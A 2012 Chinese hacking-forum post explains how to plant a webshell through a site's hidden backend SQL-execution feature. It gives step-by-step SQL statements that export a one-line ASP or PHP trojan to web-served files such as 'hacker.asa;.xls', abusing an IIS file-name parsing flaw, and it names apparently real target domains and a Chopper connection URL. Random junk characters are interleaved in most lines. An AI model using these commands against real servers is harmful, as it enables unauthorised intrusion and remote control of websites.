好不容易进了后台,发现啥上传啊。备份啊多木有。: p% r9 t4 @1 s. P8 S$ T5 z* k5 k
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的) v7 v* U) m3 H. c7 _' k
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,* A1 o2 e0 }2 M! H; j, a
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:& D2 Y" p" j% r! M
1.create table cmd (a varchar(50))
* o0 u) r" r; b* b: X" X! W+ \+ w: ]2.insert into cmd (a) values (‘‘)
0 d7 u- T+ A3 f, n* P) V( {; a3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd) l, L" S& g8 ^: R- v) A
(把表cmd的内容导出为物理路径的一个EXCEL文件)$ X8 X, I2 N6 c3 {9 f( M4 Q
4.drop table cmd0 |1 G4 o) k9 v) l; W3 q+ g8 R0 W
利用IIS的BUG成功拿到了WEBSHELL。
0 ~9 }! |1 z# V5 q: A |4 j6 Q. p4 y; J: E$ e! {
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
t4 L: D4 t0 b; {! d; u; ^
! I$ J* |0 N! a! Q& o, ] SQL语句意思解释:
; ^6 m' h+ ]( R, s9 A8 E1 a 第一句: c1 i) d! a! w: b- i. x3 `, e
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50" a# f# e+ \ I' A
: a! T' W: q) B/ V1 r s, G8 ? 第二句% ]. D# e3 W8 w' w, q, ~
在表cmd的a字段插入一句话木马
, }1 Y0 y* W0 l/ z% o( {7 Z" ] 第三句
7 l! e+ D Z; b0 {8 q$ Q 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
; e2 ?: |4 f+ K2 P; t" y1 g9 ?. n- n& r. T \# n
第四句& B% S3 L6 j; X% B6 m L
删除建立的cmd表
- F& _6 u; C/ y; e6 Q9 B
& d7 x) T) p: S- ~+ e1 ?% L. k 以下内容为测试:
- n8 `5 T; [5 M, E; I1 i Access利用后台SQL执行命令功能导出WebShell:
& ~+ j9 W8 q. Y 这个更简单:
; D" N( }4 K; P7 s [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
: m& m% j C3 ?' X5 W 或者
$ {4 G( {. L; U2 L; V/ M$ _ [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]3 f) l; V, K5 U0 Y3 e- ~
& r. d: z0 b' j+ _ 后台有执行SQL语句功能(vote为已知表段)4 f/ e. Y, ^0 W- l: \+ j3 D5 p
希望对大家有所帮助拿shell的又一个思路
& c+ d9 W k @3 c& N4 e O |
发表于 2012-9-13 17:53:58
收藏
支持
反对